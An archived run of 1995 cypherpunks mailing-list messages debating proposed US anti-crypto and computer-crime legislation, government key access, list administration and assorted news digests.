>>   From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
>>   Date: Thu, 13 Jul 1995 13:46:10 -0500
>>
>>   An article posted on sci.crypt stated that quantum factoring
>>   is real and that an article was posted in this month's Science
>>   magazine. The author of the post says this would make factoring
>>   a 10 bit number the same time as factoring a 100000000 bit number.
>>
>>You can bet your ass and your mother's and grandmother's donatable
>>organs that if this were possible, then the legislative initiatives
>>currently underway would not be: they'd just let us use RSA and get
>>a false sense of security.

You give them too much credit.

Still, there's always IDEA and suchlike.  The legislation would stand in
any event.


>Even with a quantum computer, factoring is still an extra step that is not
>required with GAK. Besides, factoring will always be more expensive than
>GAK, at least for the other side.
>
>- --
>- -- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.
>- ---
>[This message has been signed by an auto-signing service.  A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>iQBFAwUBMAW0VSoZzwIn1bdtAQG9QQF+OWci7VK8X9/ropNlf5dGW5/jbHWo+4cR
>2GvuYpDvoAbDRQmDcpFR7u8hBog7KIet
>=c/wa
>-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Fri, 14 Jul 95 18:28:39 PDT
To: cme@tis.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507142311.AA09635@tis.com>
Message-ID: <9507150128.AA16854@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 14 Jul 95 19:11:39 EDT
   From: Carl Ellison <cme@tis.com>
   Cc: cypherpunks@toad.com
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

[I've combined parts of Carl's two recent messages...]

   I believe that the concern about defining predicate acts this way comes
   from the RICO requirement that there be TWO instances of a crime in order
   to pass the test of perpetrating a *pattern of crime* and therefore be
   ranked as a mobster subject to RICO.  My guess is that the intent is that
   from one placement on an FTP server or one posting to a newsgroup, the
   perpetrator of that heinous act will have passed his RICO qualification and
   therefore be subject to having all he owns taken from him.

I agree with Carl here.  

   The crypto section has no GAK exclusion.  It makes it as illegal to release
   GAKed crypto on a net as PGP.

The proposed 1030A(c) provides a defense to prosecution under 1030A(a).
So if GAKed crypto satisfies 1030A(c) then it can be deployed without
fear of prosecution under 1030A(a).  It might still violate ITAR, of
course, although I suspect any system that satisfies 1030A(c) would be
granted a CJ.

   >       `(c) It shall be an affirmative defense to prosecution under this
   >     section that the software at issue used a universal decoding device
   >     or program that was provided to the Department of Justice prior to
   >     the distribution.'.

   This isn't escrowed encryption being allowed here.  This is straight giving
   of keys (or a back door) to the gov't.  Even Clipper fails this test.

Why doesn't GAK satisfy this clause?  Clearly if the keys are escrowed
with two Dept. of Justice entities (or if there's only one escrow agent
and it's a DOJ entity) then DOJ will have been provided with sufficient
information to decode any encrypted information by themselves.  

Certainly commercial escrow systems (such as TIS's CKE[*] system with DRCs
(data recovery centers) and DRFs (data recovery fields)) could fail this
test, since the chosen escrow agents may not be subject to DOJ control.
But I could build a CKE system with an "overriding UI (user identifier)"
that had access to all the keys, and provide that UI to DOJ.  The
"universal decoding device" would then be to go to the DRC, present that
UI and the DRF and recover the desired information.

I don't see how Clipper fails the 1030A(c) test, except possibly for the
fact that the proposed escrow agents were not both within DOJ.  I think
that's a minor point.

					--bal

[*] See ftp://ftp.tis.com/pub/crypto/drc/papers/drc.ps, Carl's initial
description of the TIS CKE system.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 14 Jul 95 18:46:41 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <9507150146.AA11209@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim's original transmission of the following message didn't make it out to
the (briefly annulled) list. I've already replied to Tim in private, but I'll
offer my apologies if I've misled anyone as to whose mail originally went
where.

-Futplex

Forwarded message:
> From tcmay@sensemedia.net Fri Jul 14 02:01:08 1995
> Date: Thu, 13 Jul 1995 23:03:50 -0700
> X-Sender: tcmay@mail.sensemedia.net
> Message-Id: <ac2b562c03021004310a@[205.199.118.202]>
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> To: futplex@pseudonym.com, cypherpunks@toad.com
> From: tcmay@sensemedia.net (Timothy C. May)
> Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
> 
> At 2:57 AM 7/14/95, L. McCarthy wrote:
> >> Perry,
> >>
> >> I have all I'm going to take of your acerbic rudeness to me.
> >>
> >> I will no longer be responding to any of your messages.
> >>
> >> --Tim
> >
> ><sigh>
> >
> >Everybody needs to take a deep breath and count to 1,000. Seriously,
> >we're all feeling plenty of stress today. Various people have been
> >talking about getting out of the U.S. while the going's good (?), and
> >it doesn't sound much like hyperbole this time. It's not surprising that
> >we're releasing our frustration on each other, lashing out at the nearest
> >quasi-tangible targets.
> 
> Note that I didn't post that to the list.
> 
> Your requoting it, without the intermediate quoting of the person who _did_
> post it to the list, makes it appear I was spewing this garbage to the
> list, when I wasn't.
> 
> I don't care for your pop psychology. I would've followed your advice and
> left these comments in e-mail only, had you done the same.
> 
> --Tim May
> 
> ..........................................................................
> Timothy C. May         | Crypto Anarchy: encryption, digital money,
> tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
> 408-728-0152           | knowledge, reputations, information markets,
> Corralitos, CA         | black markets, collapse of governments.
> Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
> "National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buzz@static.noise.net (Buzz White)
Date: Sun, 16 Jul 95 02:12:03 PDT
Subject: The Recent Flurry of Anit-Crypto Activity... Why?
Message-ID: <3u6oj5$fir@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anybody given thought to the reasons behind this..

More to the point, the question  "Why Now?" comes to my mind.

It generally takes (criminal) legislation a couple of years to be effective,
i.e. get hammered out, passed, and entered into the US Code by the
legislature, then get acted upon by local DA's, then have a court case come
to a successful conclusion for the lawmakers.

Well, if anybody bothers to look, over the next 2-5 years, some very
significant US patents expire concerning crypto - and this opens the door
for a truly widespread integration of "difficult" crypto into commonly used
systems, by "big name" software manufacturers, who have heretofore shied
away due to patent infringement fears (and ITAR restriction, which will
hopefully soon fall due to the courts).  

Let's face it - the real reason that public key crypto hasn't gone over (here
in the US) is that there has only been generally ONE source of commercial
public key crypto - and they are not concerned with doing anything in a
competitive nature (other than using civil lawsuit threats to maintain their
monopoly).  Shareware and Freeware are great, but it is hard to get most
companies to accept them for general usage (The arguments I have had with
clients just to get them just to accept binaries compiled with GCC,
jeezus!).  And Shareware/Freeware (with a few notable exceptions) products
do not usually have that "slick" consumer (i.e. computer illiterate)
oriented interface that most non-technical users need.  As an example,
compare how simple the Mac and Windows interfaces are for the most
successful  products, then look at the interface to PGP - even via Private
Idaho and WinPGP or WinFront it is kluge-y.  So commercial adaptation is our
ultimate best hope (until then, Shareware/Freeware and PGP are our ONLY
hope).

[climbing into pulpit]
So, I posit that this legislative swirl is an attempt to squash true "crypto
for the masses" (via real commercial integration) before it gets out "into
the world".  The C-Punks have midwifed (sp?) this one, and seen to it that
crypto has survived its infancy and is thriving in childhood (PGP), but to
get it to finally grow up and go out into the world on its own, it needs to
be commercially viable.  That means no hassles over the algorithms, etc.  The
next few years could see crypto leave our loving environment and flourish,
or see it get ambushed by government agents with shotguns on the doorstep.
That is what our next fight should be -- to delay these laws until they are
too late.  For once we get crypto truly running free and loose, there will
be no way to rein it in again.
[climbing out of pulpit]

Anybody have a better analysis of the "Why Now" part of the question?  I'd
love to hear a better reasoned (possibly not as paranoid) opinion, as this
one just occurred to me - and I kinda flung it out here without too much
forethought.  And as for the ambush  metaphor, ask somebody about Randy
Weaver's wife...

Buzz

--
Liberals and Conservatives differ only in what they regulate
and which part of government power they increase.  One wants
to control your money, the other your soul.
No Thanks - I'll keep my money and my soul for myself.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 20:12:23 PDT
To: cypherpunks@toad.com
Subject: MYS_fit
Message-ID: <199507150312.XAA23783@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper Page Oner:


   "2 Groups of Physicists Produce Matter That Einstein
   Postulated."

      By chilling a cloud of atoms to a temperature barely
      above absolute zero, scientists at a Colorado laboratory
      have at last created a bizarre type of matter that had
      eluded experimenters ever since its potential existence
      was postulated by Albert Einstein 70 years ago. The
      creation of this Bose-Einstein condensate -- named for
      Einstein, and the Indian theorist Satyendra Nath Bose --
      was hailed yesterday as the basis of a new field of
      research expected to explain some fundamental mysteries
      of atomic physics. A Texas group later produced similar
      results. The achievement should allow physicists to peer
      directly into the realm of the ultrasmall.     MYS_fit


   [This was also reported in The Economist of July 1.]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 20:13:51 PDT
To: cypherpunks@toad.com
Subject: SEK_hel
Message-ID: <199507150313.XAA23951@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper:


   "U.S. Spells Out Antitrust Inquiry Into Microsoft."

      The Justice Department said today that the Microsoft
      Corporation might well be violating antitrust laws by
      including software for its new on-line network in
      Windows 95, its much-anticipated operating system for
      personal computers.                            JUS_kid


   "Sting on Internet Leads to a Child Sex Case."

      In a case involving child pornography, the Internet and
      a self-appointed enforcer whom one critical defense
      lawyer calls an "electronic vigilante," a Nevada man is
      facing prison for crossing state lines with the
      intention of having sex with a 14 year-old girl he had
      met on a popular computer network.             SHE_dev


   [Editorial] "The Guns of Waco and Ruby Ridge."

      There is little doubt that the Federal Government
      contributed heavily to two of the biggest law
      enforcement fiascoes in recent memory. One was the
      disastrous 1993 Federal raid on the Branch Davidian
      compound at Waco, Tex. The other was the tragic 1992
      encounter between the F.B.I. and a band of white
      separatists at Ruby Ridge, Idaho.              LIT_bub



   3:  SEK_hel









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 14 Jul 95 23:52:09 PDT
To: cypherpunks@toad.com
Subject: Re: ADMIN: List wipeout and recovery
Message-ID: <ac2cb2180f021004ef06@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 AM 7/15/95, Hugh Daniel wrote:
>to fixit.  Using two heads was better than one and we realized that we
>had a online backup only 2 days old.  Minutes later it was installed
                          ^^^^^^^^^^^
>and the list is back to where it was late on 1995/07/11.

I think your backup is a lot older than 2 days old, as a "who cypherpunks"
request showed this as my list address:

....
talon57@well.sf.ca.us
tcmay@netcom.com (Timothy C. May)
tentacle@hclb.demon.co.uk
....

I haven't been subscribed as "tcmay@netcom.com" since mid-June. Since
mid-June I've been subscribed as "tcmay@sensemedia.net".

Why did I get this message at my sensemedia.net address if in fact "who
cypherpunks" shows my subscription address is only at Netcom? Beats me. I
checked and I am not subscribed under both addresses, and a grep of the
"who cypherpunks" list doesn't show a sensemedia.net address for me. Maybe
the "who cypherpunks" at 16:21 today is a different backup list than the
supposedly 2-day old list.... Something for the X Files, perhaps.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Fri, 14 Jul 95 22:03:43 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <Pine.3.89.9507150010.A21948-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm posting this again, not because I think it contains any
particularly profound insights, but rather because I initially
sent it around midnight last night and it was not reflected
here so I suppose it did not make it out.

AR

---------- Forwarded message ----------
Date: Fri, 14 Jul 1995 00:12:14 -0500 (CDT)
From: Allen Robinson <sebaygo@intellinet.com>
To: Ray Arachelian <sunder@escape.com>
Cc: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)

On Thu, 13 Jul 1995, Ray Arachelian wrote:

> On Thu, 13 Jul 1995, L. McCarthy wrote:
> 
> > Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
> > Anti-electronic Racketeering Act of 1995. This bill makes important changes
> > to RICO and criminalizes deliberately using computer technology to engage in
> > criminal activity. I believe this bill is a reasonable, measured and strong
> > response to a growing problem. According to the computer emergency and
> > response team at Carnegie-Mellon University, during 1994, about 40,000
> > computer users were attacked. Virus hacker, the FBI's national computer
> > crime squad has investigated over 200 cases since 1991. So, computer crime is
> > clearly on the rise.
> 
> Eh, what do "virus hackers" have to do with encryption, why is it these 
> morons justify the destruction of encryption by mentioning hackers and 
> viruses?

The use of terms such as "virus" and "hacker" in a context such
as this has little or nothing to do with what the terms actually
mean.  It's palpably obvious that they are being bandied about
here solely for the knee-jerk emotional reactions they evoke.
Even those more computer/net clue-impaired than Grassley (assuming
that such is possible) know from watching TV and the movies that
a virus is a Bad Thing (tm) and that hackers are evil!
Pseudo-digital demagoguery.
 
> Additionally, does this mean that someone outside of the USA is in danger 
> of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing 
> crypto software and publishing it in the open?  After all, once it winds 
> up on some USA site, how do we know that someone outside the USA got his 
> copy of SuperDuperNSASpookFree from a non-US site?  Just to be sure, 
> we'll bust both the site operator and nab the guy who wrote it next time 
> he drops in, or hell, we'll have him extradited.  

Or simply kidnap him and escort him back to the U.S.
 
<snip>

> > I believe we need to seriously reconsider
> > the Federal Criminal Code with an eye toward modernizing existing statutes
> > and creating new ones. In other words, Mr. President, Elliot Ness needs to
> > meet the Internet.
> 
> Where is Elliot Ness?  I don't see any mafia.org on the net.  Anyone here 
> see any such site?

It might be even more beneficial if Senator Grassley and the other
members of our august deliberative bodies would meet the internet.
My gut reaction to the recent tide of legislation is that they are
seeking to strangle what they fear and that they fear what they do
not understand.  (Too melodramatic?)
 
> > Mr. President, I sit on the Board of the Office of Technology Assessment.
> > That Office has clearly indicated that organized crime has entered cyberspace
> > in a big way. International drug cartels use computers to launder drug money
> > and terrorists like the Oklahoma City bombers use computers to conspire to
> > commit crimes.
>
> Was it not proven that McVeigh and Co. >DID NOT< use a computer?  The AOL 
> account was a hoax, no?  Where are the hordes of anti-USA terrorists, 
> and drug pushers on the net? 

You don't recognize them because they are masquerading 
as "virus hackers".

Again, the main reason for playing the "terrorist" card is
for the emotional hot-buttons they can push by so doing.
Since Grassley didn't use it, look for someone to introduce
something this session titled, "The Avenge Those Poor,
Innocent, Bloody Dead Children Act of 1995".

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Fri, 14 Jul 95 21:08:58 PDT
To: cypherpunks@toad.com
Subject: S. 982 Kyl-Leahy(-Grassley) NII Protection Act
Message-ID: <9507150408.AA21123@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


S. 982 is "the other bill" introduced recently in the Senate, the
National Information Infrastructure Protection Act of 1995 (introduced
by Sens. Kyl, Leahy and Grassley).  Since it has bipartisan support plus
the support of the Attorney General I thought it might be a good idea to
see what it really does.

I've made available via WWW the following documents:

	The text of S. 982: The National Information Infrastructure Protection Act of 1995; 
        The text of 18 USC 1030 as it is currently; 
        The text of 18 USC 1030 as modified by S. 982; 
        Sen. Kyl's statement introducing S. 982; 
        Sen. Leahy's statement introducing S. 982; 
        A section-by-section analysis of S. 982 provided by Sens. Kyl and Leahy; 
 
All are available from my "Legal Issues" page at:

	http://www-swiss.ai.mit.edu/~bal/legal/

The "text of 18 USC 1030 as modified by S. 982" is perhaps the most
interesting, since it shows both text removed by the bill (in italics)
and text added by the bill (in boldface).

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Fri, 14 Jul 95 23:14:23 PDT
To: cypherpunks@toad.com
Subject: Re: MYS_fit
In-Reply-To: <199507150312.XAA23783@pipe3.nyc.pipeline.com>
Message-ID: <199507150614.AAA05933@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




O.K., this is totally off any reasonable topic, but allow me the indulgence:

>    "2 Groups of Physicists Produce Matter That Einstein
>    Postulated."

I've been hanging around Carl Wieman's lab for a couple of years (a friend
of mine works on one of the projects), and this is one hell of an 
achievement. The apparatus they use sits on a tabletop, and you can
watch the gas through infrared T.V. cameras in real time. The trap is just
a little vacuum chamber with windows in the side. They use the same
diode lasers that come in your C.D. player, an ingeniously inexpensive
setup. 

Yow!

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@xanadu.mindport.net>
Date: Fri, 14 Jul 95 21:39:32 PDT
To: cypherpunks@toad.com
Subject: Ssh and Macintosh applications.
Message-ID: <199507150535.AAA00185@xanadu.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Having looked over the Ssh blurbs, I can't help but want to use it.  NOW.

Is anyone more skillful than I going to try and port some sort of support
for those of us who are using a Mac with, say, a direct connection to a
provider using Ssh?

Please?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Sat, 15 Jul 95 01:05:16 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <Chameleon.4.01.2.950715030350.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Originally sent to list during server failure:
---------------Included Message---------------

Perry Metzger wrote:

>"Robert A. Hayden" writes:
>> We've seen the enemy, that they are the 535 senators and representatives 
>> in D.C., and the staff in the White House.  It's time to shore up our 
>> allies and enter the battle with the best weapons we have; information 
>> and popular use.
>
>As unpleasant as the congress is, it isn't the enemy. The governmental
>forces desiring control are not the same as the congress.

This is true.  IMNSHO we are witnessing yet another case of the 
representation of an illegitimate constituency.  Grassley is not representing 
the people of his state -- he is representing and carrying water for federal 
government interests.  While some people used to acidly refer to "The Senator 
from Texaco" and such, it is a much more common situation that some Senators 
and Representatives represent federal agencies in matters before their 
chamber that virtually NO VOTER would ever think of or could even discover as 
a matter of personal interest.  You can be sure Cathy Cornflower of Cherokee 
didn't start this by writing Grassley and suggesting that RICO be expanded to 
cover distribution of non-GAK crypto.  It is inconceivable that more than a 
tiny handful of Grassley's constituents would even recognize anything in his 
bill if stopped on the street and asked about it.

Agencies develop "friendly" congresscritters like the Soviets used to develop 
"friendly" journalists and politicos.  It wouldn't even be all that 
surprising if similar methods are used.  The "friendlies" take obscure and 
not-so-obscure issues before their house on behalf of the agencies.  At some 
level this is probably necessary, but with all those folks getting comfy with 
each other up there in Disneyland-on-the-Potomac, it's impossible that unholy 
alliances do not develop.  The "us vs them" mentality of a congresscritter 
grows to encompass all three branches under "us" and views the unwashed 
masses as "them."  In that view the suit from XYZ who comes over to confer 
with the staffers is "one of us."  He gets right in (while visiting 
constituents wait stupidly for an appointment that the elected official will 
be -- we're so sorry -- unable to keep).  He's bringing up an issue of 
concern to "us."  "We" have a problem that needs to be fixed by modifying 
para (a) of sec (3) to read "shall" instead of "may."  "We" will feel very 
important and may even win some special stroking or quid pro quo for fixing 
"our" problem.

The one real flaw in this is that the electorate was just left out of the 
loop, and kept in the dark to boot.  When the elected official went into "we" 
mode he ceased representing the people who sent him there.  In these 
increasingly totalitarian times it's likely his representation was 
distinctly CONTRARY to the interest of those who sent him there.

There have been cases of agencies approaching "their" congressman and having 
completely new language inserted in a conference bill -- language that was 
never in the original, never offered as an amendment until the bill from each 
house went to conference, and never debated when the conformed bills returned 
for final vote.  It's the norm that such maneuvers go completely unreported 
in the media.

>Congressmen are by and large harried and ignorant people. They have no
>idea what any of this is about. We have the choice of letting Louis
>Freeh do all the educating, or having a white shoe Washington PR firm
>do some of the educating, too. I favor the latter approach.

There is also something that is almost always overlooked... taking names.  It 
is possible to "pull on the string" and follow the visible event back to the 
less immediately visible actors.  The congresscritters, though by and large 
harried and ignorant, are not always guiltless.  At best they are willing 
agents for little bits and pieces of the fabric of overweening statism.  In 
every case, though, there are faceless staffers who may also be harried but 
are usually NOT ignorant.  The staffers are often the ones who "sell" the 
congresscritter on signing onto this or that non-voter issue for this or that 
self-serving political reason.  Staffers also include the people with huge 
political axes to grind -- people who gravitate to the positions of writing 
the text of the bills that translate the generality to which the elected 
official has acceded into excruciatingly detailed and usually 
confusing legislative language.

There's a relatively small number of really activist people in government, 
and not all of them are public and visible.  It's possible that some 
congresscritters could be defeated with the aid of dissemination back home of 
information on the non-voter issues they've championed and concise 
explanations of how many of those issues work to harm their voters.  It's 
also possible that some of those faceless staffers could be turned into 
liabilities by focusing some light on them, thereby reducing their 
effectiveness and employability.

>This is not to say that we shouldn't be widely deploying crypto -- we
>should. (Of course, offshore sites will always have crypto available,
>but...) 

It would seem that the U.S. may lose a number of good minds who may prefer to 
live and write code in other parts of the world.  This has been a developing 
trend for other reasons, and now people who like to write crypto will have 
another reason to look for a new home.

>This is also not to say that Congress doesn't pass very bad laws.

Name a good one!

>However, I very, very strongly urge that we not assume that nothing
>can be done. Just winning a couple years time could totally alter the
>landscape.

Your urging is appropriate.  It's odd, though, how the country seems to be 
pulling itself in two diametrically opposed directions:  On the one hand the 
electorate shifted significantly in the '94 election, responding with greater 
enthusiasm than even the new young Turks in Congress seem to fully 
comprehend, and seeming to be fed up with too much government, prepared to 
commission the dismantling of federal bureaucracy and getting government the 
hell out of their lives.  On the other hand we see bold and impressive moves 
on the part of politicos and bureaucrats toward a suffocating, draconian 1984 
police state.  We have even heard increasing choruses of "Just following 
orders" and "Just doing my job" from mindless hatchetmen these last few 
decades -- bizarre and incredible echoes of the excuses offered in post-WWII 
war crimes defenses.

The country cannot move strongly in these two directions for long: Something 
has to give.  The longer this division persists, the greater the gulf that 
stretches between and the more "interesting" the times that will result when 
one side prevails.  The side that prevails will consume the side that fails 
with an intensity related to the energy built up in the process.

Crypto is presently on the periphery of the larger schism, though it's 
conceivable that twenty years in the future it would be clearly understood by 
most people to be central to privacy in an information age.  The moves to 
head crypto, and thus privacy, off at the pass are being made now, though, in 
an effort to prevent a future in which large numbers of people understand how 
to maintain privacy when everything is a bit stream. 

If there is a critical and unique difference between this and other 
seemingly similar situations it is the 10-15% monthly growth of the Internet, 
something that is orders of magnitude greater than what humans are accustomed 
to perceiving, estimating, handling, coping with.  If recent figures are 
accurate, 7,500+ new web pages have been created in the 33 hours since this 
thread started here and perhaps 100,000 new people are on the net in one way 
or another.  It's unlikely that Grassley or Exon or Leahy can assimilate all 
the implications of that rate of growth.  "Senator, the blob is at the door!" 
 "Well, call the State Police!"  "Uh, sir, they're at least three hours away. 
 In that time the blob will be larger than the State of Idaho!"  

The politicos have never before dealt with a sizable "throwaway minority" 
whose current growth curve intersects the U.S. population curve in 24 months 
and the world population curve in 4 years.  In a couple of days there are 
more new people getting on the net worldwide than are contained in a U.S. 
congressional district.  Partly as a result, there are issues getting 
attention that would have easily been contained just a couple of years ago by 
the policy of benignly overlooking them.  No longer.  If a net mobilization 
was disappointing last month, try it this month and see the difference.  
Movements that took years to form and grow decades ago take days or weeks 
now.  Soon they will take only hours.  

We are just now cresting the big one on the supercharged roller coaster of 
high tech infoplosion, and as the velocity rapidly builds there will be 
profound shock among the old and the slow.  Even the savvy will be surprised. 
Push this medium for all it's worth.  Find ways to promote informed privacy 
as a ground-floor issue for newbies and get them to have a knowledgeable, 
vested interest in it.  Get people onto the net.  One new person today is 
four or five people a year from now, 15-28 people two years from now.  Since 
a lot of it spreads from person to person, new people start with tools and 
concepts they get from others, so the initiation of a new netparticipant as a 
privacy-aware crypto user tends to spawn subtrees of new users in the same 
mode.  Use the growth multiplier to outflank 'em while they're noodling.

Would it be more productive to hire the white shoes or start another few ISPs 
and shepherd the new users to be privacy-aware letter writers and faxers?  
Educate your ISPs.  Any ISP that isn't political in this age is brain 
dead and dead weight.  Any ISP that sees its political interests as somehow 
different than those of its users (recent lobbying to shift burdens away 
from national services and onto users, and recent AOL admissions of 
participation in what sounded like entrapping users) is worse than brain dead 
-- it's part of the problem.

Bolivar








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@ugcs.caltech.edu ((me))
Date: Sat, 15 Jul 95 03:06:50 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131855.AA04443@cs.umass.edu>
Message-ID: <199507151006.DAA28022@beat.ugcs.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


In mlist.cypherpunks you write:

>GAK: it's not just a bad idea, it may soon be the law !
Help!   What does GAK stand for?  I've seen it a billion times,
but I missed the original explanation.

It sounds like some sort of key/crypto registration.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 15 Jul 95 05:18:55 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507151006.DAA28022@beat.ugcs.caltech.edu>
Message-ID: <199507151218.FAA00476@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> silly@ugcs.caltech.edu ((me)) writes:
> Help!   What does GAK stand for?  I've seen it a billion times,

Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
descriptive and accurate than calling it Key Escrow, since escrow is for
the benefit of the parties involved in a transaction.  I think it's Carl
Ellison's invention, and most apt it is.

	Jim Gillogly
	22 Afterlithe S.R. 1995, 12:16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 15 Jul 95 05:41:46 PDT
To: Jim Gillogly <jim@acm.org>
Subject: MANDATORY KEY REGISTRATION
In-Reply-To: <199507151218.FAA00476@mycroft.rand.org>
Message-ID: <Pine.SUN.3.91.950715053310.8362B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 15 Jul 1995, Jim Gillogly wrote:

> Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
> descriptive and accurate than calling it Key Escrow, since escrow is for
> the benefit of the parties involved in a transaction.  

I favor the term, "Mandatory Key Registration."  It is even more 
accurate, and parallels gun registration.  This should strike a
sympathetic chord with our pro-2nd Amendment friends.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sat, 15 Jul 95 05:38:41 PDT
To: cypherpunks@toad.com
Subject: Receiver anonymity in DC-nets...
Message-ID: <199507151234.AA14413@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



A method occurred to me that obviates the need for public-key cryptography
as a method of receiver anonymity in a dining-cryptographer network.

I'm *sure* someone has thought of this before. I don't, however, have
access to netscape or mosaic just now to search the archive with.

If this topic or method has come up before (if you know of it, you'll
know what I'm talking about; if not, and no one has come up with it before,
which I doubt, I'd still like the patent ;-) and one of you guys has the
relevant messages handy could you send them to me? Don't go through any
great trouble, you understand...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 15 Jul 95 07:01:45 PDT
To: cypherpunks@toad.com
Subject: POX_usg
Message-ID: <199507151401.KAA14738@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-15-95. NYPaper Page Oners:

   
   "Director of F.B.I. Demotes Deputy: No. 2 Man's Ouster Is
   Tied to Inquiry on Idaho Siege."

      F.B.I. Director Louis J. Freeh today demoted the
      bureau's Deputy Director, Larry A. Potts, citing the
      turmoil created by an internal investigation into the
      destruction of documents relating to the conduct of Mr.
      Potts and other senior F.B.I. officials in a deadly 1992
      standoff with a white separatist in Idaho.     SAV_ass


   "B-2, After 14 Years, Is Still Failing Basic Tests."

      The $44 billion B-2 bomber has radar that cannot
      distinguish a raincloud from a mountainside, has not
      passed most of its basic tests and may not be nearly as
      stealthy as advertised, according to a draft report by
      the General Accounting Office. It was provided to The
      New York Times by a Government official skeptical of the
      bomber's capabilities who sought to bring into the
      debate the report's examples of the B-2's inability to
      pass performance hurdles.                      YB2_gud



   2n1: POX_usg











